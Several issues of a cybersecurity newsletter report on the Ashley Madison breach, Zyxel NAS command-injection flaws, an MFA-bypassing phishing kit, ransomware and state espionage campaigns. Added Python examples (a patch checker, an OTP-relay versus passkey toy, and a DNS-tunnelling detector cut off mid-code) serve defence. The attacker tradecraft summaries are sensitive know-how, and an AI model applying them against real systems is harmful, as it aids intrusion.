  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

The Ashley Madison Hack


The Ashley Madison Hack:

When Secrets Weren't Safe 🔓💥

……

In light of the Netflix documentary, we thought we'd give you the cold, hard 👀 facts surrounding the hack that was heard around the globe. So strap on! 🍆 Ahem, sorry: strap in, because it'll be a humpy 🙈 BUMPY ride 😂😂😂

So, here goes: In the sultry summer of 2015, the internet was rocked by a scandal so spicy it made tabloid headlines blush. 🌶️🌍 The infamous Ashley Madison hack exposed the hidden liaisons of millions of users, turning a private affair into a very public debacle. 😱📂

For those who might not recall, Ashley Madison was the go-to site for discreet extramarital escapades. Their cheeky slogan, "Life is short. Have an affair," tempted many into a web of clandestine connections. 🍎🔗 But it turns out, the only thing more seductive than secret trysts was the allure of a juicy scandal.

👨‍💻 Enter the hackers: a group calling themselves "The Impact Team." These cyber crusaders had a bone to pick with Ashley Madison's parent company, Avid Life Media. They claimed to be exposing the site's dubious practices, including deceptive marketing and failing to delete user data despite charging fees for a "full delete" option. 🤑💔

On July 19, 2015, The Impact Team delivered an ultimatum: shut down Ashley Madison or face the release of its entire user database. 🚨🗂️ When the site didn't comply, the hackers made good on their threat, dumping a treasure trove of data on the dark web. 💾🌑

The fallout was nothing short of catastrophic. 🌪️ Millions of email addresses, credit card details, and user profiles were out in the open, exposing everyone from high-profile celebrities to regular folks. 🕵️‍♂️📉 Even government officials and corporate executives found their secrets laid bare, leading to resignations, broken marriages, and a slew of lawsuits. ⚖️💣

But the drama didn't stop there. The Ashley Madison hack also sparked a wave of phishing attacks, blackmail attempts, and even a few tragic suicides linked to the exposure. 😢💔 It became a cautionary tale about the perils of online privacy and the double-edged sword of digital anonymity. 🛡️💻

The breach also unveiled some rather amusing tidbits. For instance, it turned out that a significant number of female profiles on the site were either fake or inactive. 🤖👩‍🦰 Talk about an affair to remember—only it was more of an affair with an illusion. The hackers' claim that most female accounts were bots added another layer of irony to the whole debacle. 🤷‍♂️🤖

In the aftermath, Ashley Madison faced a mountain of criticism and a plummeting user base. 📉💥 The company tried to patch things up by enhancing their security measures and rebranding efforts, but the damage was done. They even attempted to regain public trust by hiring a cybersecurity expert to overhaul their defences. 🔒🛠️ Despite these efforts, the shadow of the hack loomed large over the site's reputation. 🕳️

The legal repercussions were equally explosive. Class-action lawsuits sprang up like mushrooms after a rainstorm, with users demanding compensation for the breach of their privacy. 💸⚖️ In 2017, Ashley Madison's parent company agreed to an $11.2 million settlement to placate the plaintiffs. 🏛️💵

So, what's the moral of this steamy saga? 😏🔍 In the digital age, even the most clandestine corners of the internet aren't immune to prying eyes. 🔍🕵️‍♀️ If you're engaging in some online hanky-panky, remember that your secrets might not be as safe as you think. 🔐💔 As the saying goes, "When you dance with the devil, you're bound to get burned." 💃🔥

The Ashley Madison hack remains one of the most talked-about breaches in cyber history, serving as a stark reminder that no one is untouchable in the digital world. 🌍🔓 Whether you're a high-profile politician or just an everyday thrill-seeker, the lessons are clear: protect your data, question online promises, and maybe—just maybe—stick to flirting in person. 😉🕶️

So, next time you think about stepping into the world of online escapades, remember the cautionary tale of Ashley Madison. After all, in the world of cybersecurity, a little discretion goes a long way. 🔐

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

European Banks Targeted in Phishing Scam


Welcome to Gone Phishing, your daily cybersecurity newsletter that's got Rishi praying for StArmageddon 🙃🙃🙃

It's Friday, folks, which can only mean one thing… It's time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the Week. Okay, that's it.

Congrats, the cybercriminals are no match… for your patch! 🩹🩹🩹

See you in Zyxel 😈🔥💀

🚨 Urgent Update: Critical Security Flaws in Zyxel NAS Devices 📱

Zyxel has released updates to address critical vulnerabilities in two of its end-of-life (EoL) network-attached storage (NAS) devices. Exploiting three of these flaws could allow unauthenticated attackers to execute OS commands and arbitrary code. 🛡️

Impacted Models 💥

  • NAS326 (versions V5.21(AAZF.16)C0 and earlier)

  • NAS542 (versions V5.21(ABAG.13)C0 and earlier)

Resolved in ✔️

  • NAS326: Version V5.21(AAZF.17)C0

  • NAS542: Version V5.21(ABAG.14)C0

Key Vulnerabilities 🔑

  • CVE-2024-29972: Command injection via "remote_help-cgi" allowing OS command execution.

  • CVE-2024-29973: Command injection via the 'setCookie' parameter.

  • CVE-2024-29974: Remote code execution via "file_upload-cgi" by uploading a crafted configuration file.

  • CVE-2024-29975: Privilege management flaw in a SUID binary enabling local root command execution.

  • CVE-2024-29976: Flaw in the 'show_allsessions' command exposing admin session information.

Top Tips 🛡️

Update immediately to the latest firmware versions to ensure your devices are protected. Note that two privilege escalation flaws requiring authentication remain unpatched. No evidence suggests these flaws have been exploited in the wild, but updating ensures optimal protection.
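To turn the advisory's version strings into something an asset inventory can act on, here is an added Python example (written for this page; it is not Zyxel's code or the newsletter's). It parses the V5.21(AAZF.16)C0 style of string and reports whether a NAS326 or NAS542 is at or above the fixed release quoted above. The hostnames and inventory are constructed, and the assumption that the numeric fields within one firmware branch compare in order is mine.

```python
import re
from typing import NamedTuple

# Fixed firmware versions quoted in the advisory above, per model.
FIXED_VERSIONS = {
    "NAS326": "V5.21(AAZF.17)C0",
    "NAS542": "V5.21(ABAG.14)C0",
}

# Zyxel NAS strings look like V<major>.<minor>(<branch>.<patch>)C<release>.
_VERSION_RE = re.compile(r"^V(\d+)\.(\d+)\(([A-Z]+)\.(\d+)\)C(\d+)$")


class ZyxelVersion(NamedTuple):
    major: int
    minor: int
    branch: str    # model-specific firmware branch, e.g. AAZF for the NAS326
    patch: int
    release: int   # trailing C<n> revision


def parse_version(text: str) -> ZyxelVersion:
    """Parse a Zyxel NAS firmware string; raise ValueError on anything else."""
    m = _VERSION_RE.match(text.strip())
    if m is None:
        raise ValueError(f"unrecognised Zyxel version string: {text!r}")
    major, minor, branch, patch, release = m.groups()
    return ZyxelVersion(int(major), int(minor), branch, int(patch), int(release))


def _order_key(v: ZyxelVersion):
    return (v.major, v.minor, v.patch, v.release)


def is_patched(model: str, version: str) -> bool:
    """True if `version` is at or above the fixed firmware for `model`.

    Assumption: within one branch the numeric fields compare in order
    (major, minor, patch, release). A string from another branch is not
    firmware for this model and raises ValueError.
    """
    if model not in FIXED_VERSIONS:
        raise KeyError(f"no fixed version known for model {model!r}")
    fixed = parse_version(FIXED_VERSIONS[model])
    seen = parse_version(version)
    if seen.branch != fixed.branch:
        raise ValueError(f"{version} is not {model} firmware (branch {fixed.branch} expected)")
    return _order_key(seen) >= _order_key(fixed)


def triage(inventory):
    """Classify (host, model, version) tuples as patched, vulnerable or unknown."""
    results = []
    for host, model, version in inventory:
        try:
            status = "patched" if is_patched(model, version) else "vulnerable"
        except (KeyError, ValueError):
            status = "unknown"   # not a model this check knows, or a malformed string
        results.append((host, model, version, status))
    return results


# Constructed inventory for the demonstration; hostnames and versions are made up.
SAMPLE_INVENTORY = [
    ("nas-finance", "NAS326", "V5.21(AAZF.16)C0"),
    ("nas-backup", "NAS326", "V5.21(AAZF.17)C0"),
    ("nas-media", "NAS542", "V5.21(ABAG.13)C0"),
    ("nas-lab", "NAS542", "V5.21(ABAG.14)C0"),
    ("nas-old", "NAS326", "V5.20(AAZF.9)C0"),
    ("fw-edge", "OTHER-MODEL", "V4.73(ZZZZ.1)C0"),   # placeholder: not a NAS in the advisory
]

if __name__ == "__main__":
    for host, model, version, status in triage(SAMPLE_INVENTORY):
        print(f"{host:12} {model:12} {version:20} {status}")
```

Because both models are end-of-life, an "unknown" result for a NAS326 or NAS542 (for example a version string the regex does not recognise) is worth treating as vulnerable until someone has looked at the device.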

Now, on to today's hottest cybersecurity news stories:

  • 🎣 Phishing kits bypass MFA to target European banks 🏦

  • 🏡 Work from homers, watch out! Scammers abound! 👨‍💻

  • 👀 Let's ChatGPSee about that… plugin flaws galore 🔌

Hackers: Go Phish, MFAs 🎣👀💀

🚨 Cybercriminals Strike Again! European Banks Targeted 🎯

Cybercriminals are using a new phishing-as-a-service platform called V3B to target European banking clients. Priced between $130 and $450 monthly, this kit enables fraudsters to bypass multi-factor authentication (MFA) with ease. Resecurity researchers found V3B has been operational since March 2023, allowing fraudsters to mimic over 50 financial institutions.

🔍 Advanced Features and Social Engineering

V3B uses social engineering and spoofing to trick victims into revealing sensitive information. It supports real-time interactions, evading MFA through methods like SMS codes, QR codes, and PhotoTAN, a common second-factor app in Germany and Switzerland. The kit also boasts advanced obfuscation and anti-bot measures, making detection challenging.

💬 Promoted by "Vssrtje"

A threat actor named "Vssrtje" promotes V3B on Telegram and dark web communities, with the associated Telegram channel having over 1,255 members. Hundreds of cybercriminals are estimated to use this kit, leading to significant financial losses for European banks.

💳 Interception of Credit Card Data

V3B isn't limited to banks; it also targets credit card data, recently adding support for International Card Services with Dutch templates. The kit's multi-country targeting, encrypted code, and live chat with victims make it a formidable tool for fraudsters.

🌍 European Banks at High Risk

With the European Union's substantial economy and mature financial system, phishing attacks like these pose a serious threat, causing considerable financial losses. Stay vigilant and secure your banking information!
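The "real-time interactions" that let a kit like V3B get past SMS codes work because a relayed one-time code says nothing about which site the customer typed it into. The following is an added Python example, not V3B's code or Resecurity's analysis, that models the two flows side by side: an SMS code relayed in real time, which the bank cannot tell apart from a genuine login, and an origin-bound credential in the style of WebAuthn/passkeys, where the browser (not the page) writes the origin into the signed data and the bank rejects a look-alike origin. The bank and phishing origins, the username, and the HMAC standing in for a signature are all constructed for the example.

```python
import hashlib
import hmac
import json
import secrets

BANK_ORIGIN = "https://bank.example"                      # constructed
PHISH_ORIGIN = "https://bank.example-secure-login.test"   # constructed look-alike


class SmsOtpBank:
    """Login flow whose second factor is a one-time code sent to the user."""

    def __init__(self):
        self._pending = {}

    def begin(self, user: str) -> str:
        code = f"{secrets.randbelow(10**6):06d}"
        self._pending[user] = code
        return code  # stands in for the SMS the customer receives

    def complete(self, user: str, code: str) -> bool:
        expected = self._pending.pop(user, None)
        return expected is not None and hmac.compare_digest(expected, code)


def otp_relayed_through_phishing_page(bank: SmsOtpBank, user: str) -> bool:
    """Models the real-time relay described in the story.

    The kit forwards the victim's login to the bank, the bank sends the code
    to the victim, the victim types it into the look-alike page, and the kit
    forwards it. The code carries no information about which site the victim
    was looking at, so the bank has nothing to reject.
    """
    code_sent_to_victim = bank.begin(user)
    code_typed_into_phishing_page = code_sent_to_victim
    return bank.complete(user, code_typed_into_phishing_page)


class Authenticator:
    """Toy origin-bound authenticator.

    Real WebAuthn authenticators hold a per-site asymmetric key pair and sign
    client data that the browser fills in; an HMAC key stands in for the
    signature here so the example runs on the standard library alone.
    """

    def __init__(self):
        self.key = secrets.token_bytes(32)

    def sign(self, challenge: str, origin_seen_by_browser: str):
        client_data = json.dumps(
            {"challenge": challenge, "origin": origin_seen_by_browser}, sort_keys=True
        ).encode()
        tag = hmac.new(self.key, client_data, hashlib.sha256).hexdigest()
        return client_data, tag


class OriginBoundBank:
    """Login flow that checks the origin embedded in the signed client data."""

    def __init__(self):
        self._creds = {}
        self._pending = {}

    def register(self, user: str, key: bytes) -> None:
        self._creds[user] = key

    def begin(self, user: str) -> str:
        challenge = secrets.token_hex(16)
        self._pending[user] = challenge
        return challenge

    def complete(self, user: str, client_data: bytes, tag: str) -> bool:
        challenge = self._pending.pop(user, None)
        key = self._creds.get(user)
        if challenge is None or key is None:
            return False
        expected = hmac.new(key, client_data, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, tag):
            return False
        data = json.loads(client_data)
        # Origin binding: data relayed from a look-alike site names the
        # look-alike origin, so it is rejected even though the tag is valid.
        return data.get("origin") == BANK_ORIGIN and data.get("challenge") == challenge


def origin_bound_login(bank, auth, user, origin_seen_by_browser) -> bool:
    challenge = bank.begin(user)  # a relay would forward this verbatim
    client_data, tag = auth.sign(challenge, origin_seen_by_browser)
    return bank.complete(user, client_data, tag)


def demo() -> dict:
    otp_bank = SmsOtpBank()
    ob_bank, auth = OriginBoundBank(), Authenticator()
    ob_bank.register("alice", auth.key)
    return {
        "sms_otp_relayed": otp_relayed_through_phishing_page(otp_bank, "alice"),
        "origin_bound_legit": origin_bound_login(ob_bank, auth, "alice", BANK_ORIGIN),
        "origin_bound_relayed": origin_bound_login(ob_bank, auth, "alice", PHISH_ORIGIN),
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name:22} accepted={accepted}")
```

Real WebAuthn adds a second layer the toy skips: credentials are scoped to the relying party's domain, so a browser on the look-alike site would not even find a credential to use. Either layer alone defeats the relay; SMS codes, QR codes and PhotoTAN have neither.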

It's a Work From Homing missile 🚀🚀🚀

🚨 Beware of Fake Work-From-Home Job Scams! 🏡

Scammers are posing as legitimate businesses, like staffing or recruiting agencies, to offer fake work-from-home jobs. These jobs often involve simple tasks, such as rating restaurants or "optimising" services by clicking buttons. The catch? Victims must make cryptocurrency payments to earn more money or unlock tasks, with all payments going straight to the scammers.

🔴 Red Flags to Watch Out For

  • You're asked to make cryptocurrency payments to your employer.

  • Job tasks are simple and include terms like "optimization."

  • No references are required during the hiring process.

🛡️ Top Tips

Be wary of unsolicited job offers and avoid clicking on links, downloading files, or opening attachments in these messages.

  • Never send money to an alleged employer.

  • Do not pay for services claiming to recover lost cryptocurrency funds.

  • Avoid sharing financial or personal information with unsolicited job offers.

📢 Report It!

If you encounter these scams, report them to the FBI IC3 at www.ic3.gov. Include any transaction information related to the scam. For more details, see prior IC3 PSA Alert Number I-082423-PSA.

Stay safe and protect your financial well-being! 💼🔒


Well, that's ChatGPT 🤷‍♂️🤷‍♂️🤷‍♂️

🚨 Secure Your Enterprise from ChatGPT Plugin Risks! 🔌

ChatGPT is revolutionising businesses with over a thousand third-party plugins available. While these plugins boost productivity, they also introduce significant security challenges. Here's what you need to know to stay safe.

⚠️ Top Security Risks with ChatGPT Plugins

Data Privacy & Confidentiality

ChatGPT plugins can expose confidential enterprise information. Ensure sensitive data is protected from unauthorised access by plugin developers or third parties.

Compliance Risks

Using these plugins might breach regulations like GDPR or HIPAA, leading to legal and financial consequences.

Dependency & Reliability

Relying on external plugins for critical operations poses risks, such as service disruptions and unreliable vendor support.

New Security Vulnerabilities

Plugins can introduce new bugs or flaws. For example, a security flaw allowed attackers to intercept and replace approval codes during plugin installation, leading to unauthorised access.

💡 Mitigation Strategies

Risk Assessments

Regularly conduct risk assessments and monitor plugins for vulnerabilities. Block risky plugins and keep an updated inventory.

Data Privacy Policies

Ensure plugins comply with your company's data policies. Exercise data deletion rights for noncompliance.

User Training

Include ChatGPT plugin security in your training programs. Keep sessions brief and impactful to maintain user awareness.

Behavioural Monitoring

Track data usage and access through plugins. Implement policies to identify and control the use of tools like ChatGPT.

Stay Vigilant! 📢

While ChatGPT plugins can enhance your business, they come with security risks that need careful management. Adopt a strategic approach to integrate these tools safely into your workflows.

Stay safe and secure! 💼🔒

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

TikTok celebrity accounts targeted


Welcome to Gone Phishing, your daily cybersecurity newsletter that's trending like #OnlyFans 🍆🍑💦

Today's hottest cybersecurity news stories:

  • ⏰ TikTok celebrity accounts targeted by zero-click attacks ⚔️

  • ⚔️ Knight ransomware 2.0 is hitting up healthcare, business 👨‍💻

  • 🍜 SE Asian governments targeted by Chinese-backed hackers 🐉

⏰ Clock ticks TikTok on zero-click d*cks 💀

🚨 TikTok Faces Zero-Click Security Breach 🔓

TikTok has acknowledged a security flaw exploited by threat actors to hijack high-profile accounts. The breach involves a zero-click takeover, where malware spread via direct messages compromises accounts without user interaction.

📉 Scope and Response

The exact number of affected users is unknown. However, TikTok has implemented preventive measures to stop the attack and prevent future occurrences. The company is working with affected users to restore access, asserting that only a "very small" number of accounts were compromised. Details about the attack and mitigation techniques remain undisclosed.

🔒 Past Security Issues

TikTok has faced several security challenges:

  • January 2021: Check Point identified a flaw enabling attackers to compile user databases and phone numbers.

  • September 2022: Microsoft discovered a one-click exploit in TikTok's Android app allowing account takeovers via specially crafted links.

  • Turkey Incident: 700,000 accounts compromised due to insecure SMS greyrouting, allowing adversaries to intercept one-time passwords.

📱 Ongoing Concerns

Malicious actors continue to exploit TikTok, using challenges like the Invisible Challenge to distribute information-stealing malware. TikTok's Chinese ownership raises concerns about data privacy and propaganda, prompting legislative actions and bans.

🌍 Global Impact

  • Legal Actions: TikTok is challenging a U.S. law requiring divestment from ByteDance, citing free speech violations.

  • Bans: Countries like India, Nepal, and Kyrgyzstan have banned TikTok. The U.S., U.K., Canada, Australia, and New Zealand restrict its use on government devices.

TikTok continues to navigate security vulnerabilities and international scrutiny as it works to secure its platform and user data.

Triggering Knight or flight responses from targeted organisations 😬

🚨 RansomHub: The Evolution of Knight Ransomware 🛡️

RansomHub, a rebranded version of Knight ransomware (formerly Cyclops), has been identified as an updated threat in the cybersecurity landscape. Knight ransomware first appeared in May 2023, using double extortion to steal and encrypt data across multiple platforms, including Windows, Linux, macOS, ESXi, and Android.

📉 Distribution and Evolution

Knight ransomware was initially promoted on the RAMP cybercrime forum and spread through phishing and spear-phishing campaigns. In February 2024, its source code was sold, likely leading to its rebranding as RansomHub. The new strain quickly launched attacks on Change Healthcare, Christie's, and Frontier Communications, among others.

🔒 Shared Characteristics and New Features

Both Knight and RansomHub ransomware are written in Go and use Gobfuscate for obfuscation. They share similar command-line help menus, ransom notes, and encryption techniques. RansomHub introduces a new "sleep" command, allowing the ransomware to remain dormant before execution, a feature seen in other ransomware families like Chaos/Yashma and Trigona.

⚙️ Tactics and Tools

RansomHub uses known security flaws like ZeroLogon to gain initial access, deploying remote desktop software such as Atera and Splashtop before executing ransomware. The strain has been linked to 26 confirmed attacks in April 2024, trailing behind other ransomware groups like Play and Black Basta.

💼 Recruitment and Expertise

Google-owned Mandiant reports that RansomHub is recruiting affiliates from recently shut down groups like LockBit and BlackCat. Veteran cybercriminals with extensive experience are believed to be behind RansomHub's rapid establishment and operations.

📈 Rising Ransomware Activity

Ransomware incidents surged in 2023, with many new variants like BlackSuit, Fog, and ShrinkLocker. One-third of these new families are variants of older ransomware, highlighting code reuse and rebranding trends. Most ransomware deployments occur outside work hours, with 76% happening early in the morning, and attackers increasingly use legitimate tools to evade detection.

🚀 Advanced Techniques

ShrinkLocker, another emerging ransomware, uses VBScript and BitLocker for file encryption, targeting countries like Mexico, Indonesia, and Jordan. This strain manipulates partition sizes to create new boot partitions, demonstrating a deep understanding of Windows internals.

RansomHub's emergence underscores the evolving and persistent threat posed by ransomware, necessitating robust cybersecurity measures and constant vigilance.


It's an Asian invasion 😳

🚨 Crimson Palace: Chinese Espionage Targets Southeast Asian Government 🕵️‍♀️

A high-profile government organisation in Southeast Asia has been the target of a "complex, long-running" Chinese state-sponsored cyber espionage operation, codenamed Crimson Palace. Sophos researchers detailed this sophisticated campaign aimed at cyberespionage to support Chinese state interests.

🌏 Suspected Target and Objectives

While the exact country remains undisclosed, it's speculated to be the Philippines due to ongoing territorial conflicts with China. The campaign's goals include maintaining access to critical IT systems, performing reconnaissance on specific users, collecting sensitive military and technical information, and deploying various malware implants for command-and-control (C2) communications.

🔗 Intrusion Clusters

Crimson Palace consists of three intrusion clusters with some activities dating back to March 2022:

  • Cluster Alpha (Mar 2023 – Aug 2023): Shares tactics with BackdoorDiplomacy, REF5961, Worok, and TA428.

  • Cluster Bravo (Mar 2023): Commonalities with Unfading Sea Haze.

  • Cluster Charlie (Mar 2023 – Apr 2024): Overlaps with Earth Longzhi, a subgroup within APT41.

Sophos believes these clusters are part of a coordinated campaign directed by a single organisation.

🛡️ Malware and Techniques

The attack features undocumented malware like PocoProxy and an updated EAGERBEE, alongside known families such as NUPAKAGE, PowHeartBeat, RUDEBIRD, DOWNTOWN (PhantomNet), and EtherealGh0st (CCoreDoor). Notable techniques include DLL side-loading and overwriting DLLs in memory to evade detection.

🔍 Cluster Activities

  • Cluster Alpha: Focused on mapping server subnets, enumerating admin accounts, and Active Directory reconnaissance.

  • Cluster Bravo: Used valid accounts for lateral movement and dropped EtherealGh0st.

  • Cluster Charlie: Used PocoProxy for persistence and HUI Loader to deliver Cobalt Strike.

These clusters reflect the coordinated operations of distinct actors with shared objectives and tools.

⚙️ Chinese Cyber Threats

The disclosure follows reports of APT41 (aka Brass Typhoon, HOODOO, Winnti) targeting Italian organisations with KEYPLUG malware, a potent tool supporting multiple network protocols for C2 traffic.

🚨 Global Implications

The Canadian Centre for Cyber Security has warned of increasing Chinese state-backed attacks targeting government, critical infrastructure, and R&D sectors. Chinese cyber threat activity is noted for its volume, sophistication, and broad targeting, utilising techniques like compromised SOHO routers and living-off-the-land tactics to avoid detection.

This detailed analysis of Crimson Palace underscores the persistent and evolving threat of state-sponsored cyber espionage, highlighting the need for robust cybersecurity measures and vigilant monitoring.

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

London hospitals hit by ransomware attack


Welcome to Gone Phishing, your daily cybersecurity newsletter that's the milkshake to Nigel Farage's cybercrime 👀🙈😂

Today's hottest cybersecurity news stories:

  • 🏥 NHS hack attack! London hospitals hit by ransomware attack 💰

  • 🐶 Decoy Dog hounds Russian power, IT firms, and govt agencies 👨‍💻

  • 🎉 Introducing the next generation of RBI (Remote Browser Isolation) 🏎️

Hackers: Can we hack it? NHS we can… For shame 😡😡😡

🚨 London Hospitals Hit by Major Cyber Attack 💥

Seven London hospitals, including Guy's, St Thomas', and King's College, faced major disruptions after a ransomware attack on Synnovis, a private firm analysing their blood tests. Operations, blood transfusions, and some C-sections had to be cancelled or rescheduled.

🏥 Hospitals Affected

  • Guy's

  • St Thomas'

  • King's College

  • Evelina Children's Hospital

  • Royal Brompton and Harefield

  • Princess Royal Hospital

🔒 Ransomware Attack Details

Hackers locked Synnovis's IT systems, demanding payment to restore access. This disrupted pathology services, forcing communication via paper and limiting lab functionality.

🩺 Emergency Measures

NHS England enacted "mutual aid" procedures to assist affected hospitals, ensuring some services continued. Despite this, elective operations were moved or cancelled.

👨‍⚕️ Leadership Response

Prof Ian Abbs, GSTT's chief executive, highlighted the significant impact on services, especially blood transfusions. Synnovis CEO Mark Dollar acknowledged the severity and called the attack a harsh reminder of cybersecurity risks.

⚠️ Ongoing Challenges

Synnovis, along with the National Cyber Security Centre, is working to resolve the issue. This is the third cyber attack on Synnovis's parent company, Synlab, in the past year.

🛡️ Stay Safe Online! 💻

Learn how to scale your GRC program with automation and AI

Spending hours gathering evidence, tracking risk, and answering security questionnaires? Move away from manual work by automating key GRC program needs with Vanta.

  • Automate evidence collection across 21+ frameworks including SOC 2 and ISO 27001 with continuous monitoring

  • Centralize risk and report on program impact to internal teams

  • Create your own Trust Center to proactively manage buyer needs

  • Leverage AI to answer security questionnaires faster

Join Vanta's webinar on June 11 to learn more about scaling your GRC program with automation and AI.

Register to save your spot.

They got that Decoy Dog in them 💀💀💀

🚨 Russian Targets Hit by "Decoy Dog" Cyber Attacks 🛡️

Russian organisations are under siege from a Windows version of the Decoy Dog malware, according to Positive Technologies. The cyberattack campaign, dubbed Operation Lahat, is attributed to the advanced persistent threat (APT) group HellHounds.

🐾 HellHounds' Tactics

HellHounds infiltrates selected organisations, gaining long-term, undetected access through vulnerable web services and trusted relationships. First identified in November 2023 after compromising a power company, HellHounds have now targeted 48 Russian entities, including IT firms, government bodies, space industry companies, and telecom providers.

🖥️ Decoy Dog Malware

Decoy Dog, a variant of the open-source Pupy RAT, uses DNS tunnelling for command-and-control (C2) communications, moving victims between controllers to evade detection. Initially known to target Linux systems, a Windows version has now been confirmed. The malware's development dates back to November 2019, with active targeting observed since 2021.

🔑 Advanced Techniques

The Windows version of Decoy Dog is delivered via a loader that decrypts the payload using dedicated infrastructure. HellHounds also employ a modified version of the 3snake tool to obtain credentials on Linux hosts. In at least two cases, they gained access through compromised Secure Shell (SSH) login credentials.

🔍 Ongoing Threat

Positive Technologies highlights that HellHounds' toolkit, based on open-source projects, is adeptly modified to bypass malware defences. This allows them to maintain a covert presence within critical Russian organisations, posing a significant and ongoing threat.
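The story says Decoy Dog carries its C2 over DNS tunnelling, which is one of the few things about it a network defender can look for without a sample. As an added example (not Positive Technologies' code or the newsletter's), here is a small Python analyser that runs over constructed resolver log lines and flags client/domain pairs showing the generic signs of DNS tunnelling: many unique, high-entropy subdomains under one registered domain, often as TXT queries. The log format, the thresholds, and the "registered domain is the last two labels" shortcut are my assumptions; nothing in the sample is a HellHounds indicator.

```python
import math
from collections import defaultdict

# Constructed resolver log lines: "<timestamp> <client> <qtype> <qname>".
# All of it is made up for the example; none of it is a real indicator.
SAMPLE_LOG = """\
2024-06-03T08:12:01Z 10.0.0.7 A www.microsoft.com
2024-06-03T08:12:03Z 10.0.0.7 A update.microsoft.com
2024-06-03T08:12:04Z 10.0.0.9 A mail.corp.example
2024-06-03T08:12:05Z 10.0.0.9 A www.corp.example
2024-06-03T08:12:05Z 10.0.0.9 A vpn.corp.example
2024-06-03T08:12:06Z 10.0.0.9 A git.corp.example
2024-06-03T08:12:06Z 10.0.0.9 A wiki.corp.example
2024-06-03T08:12:07Z 10.0.0.9 A jira.corp.example
2024-06-03T08:12:07Z 10.0.0.9 A sso.corp.example
2024-06-03T08:12:08Z 10.0.0.9 A cdn.corp.example
2024-06-03T08:12:08Z 10.0.0.9 A ntp.corp.example
2024-06-03T08:12:09Z 10.0.0.5 A www.example
2024-06-03T08:12:10Z 10.0.0.5 TXT mzk4t7q2vx9bp0ha3nlw6ycs.sync-telemetry.example
2024-06-03T08:12:11Z 10.0.0.5 TXT 8fj3rdq7ux2mzp5kb1ehvn0g.sync-telemetry.example
2024-06-03T08:12:12Z 10.0.0.5 TXT e5twq9m0rzx7k2cj4hlpb3vs.sync-telemetry.example
2024-06-03T08:12:13Z 10.0.0.5 TXT x1qz8vbm4kt6ra0ne9fhy2cd.sync-telemetry.example
2024-06-03T08:12:14Z 10.0.0.5 TXT k7pn2zxa9e4mrt5bq0wvl8jc.sync-telemetry.example
2024-06-03T08:12:15Z 10.0.0.5 TXT b3dgh6mt2kz9xqp7rf0wv5je.sync-telemetry.example
2024-06-03T08:12:16Z 10.0.0.5 TXT v9rl0xh3nzq2pk8mt6cb4fwa.sync-telemetry.example
2024-06-03T08:12:17Z 10.0.0.5 TXT t2cq7mk5zxr9pb3hv0en8jwd.sync-telemetry.example
2024-06-03T08:12:18Z 10.0.0.5 TXT p6zx4nq1tm8rkb9cv3ja0whe.sync-telemetry.example
2024-06-03T08:12:19Z 10.0.0.5 TXT h0wm3tq6zkp9rx2bv7nc5jaf.sync-telemetry.example
"""


def shannon_entropy(text: str) -> float:
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (subdomain, registered_domain).

    Assumption: the registered domain is the last two labels. Production code
    should use a public-suffix list so that names like example.co.uk work.
    """
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def analyse(lines, min_unique=8, min_entropy=3.0):
    """Flag (client, registered domain) pairs that look like DNS tunnelling."""
    groups = defaultdict(lambda: {"subs": set(), "queries": 0, "txt": 0})
    for line in lines:
        if not line.strip():
            continue
        _ts, client, qtype, qname = line.split()
        sub, domain = split_name(qname)
        if not sub:
            continue  # apex query: no subdomain to carry encoded data
        g = groups[(client, domain)]
        g["subs"].add(sub)
        g["queries"] += 1
        if qtype.upper() in ("TXT", "NULL", "CNAME"):
            g["txt"] += 1  # record types with room for a response payload
    findings = []
    for (client, domain), g in sorted(groups.items()):
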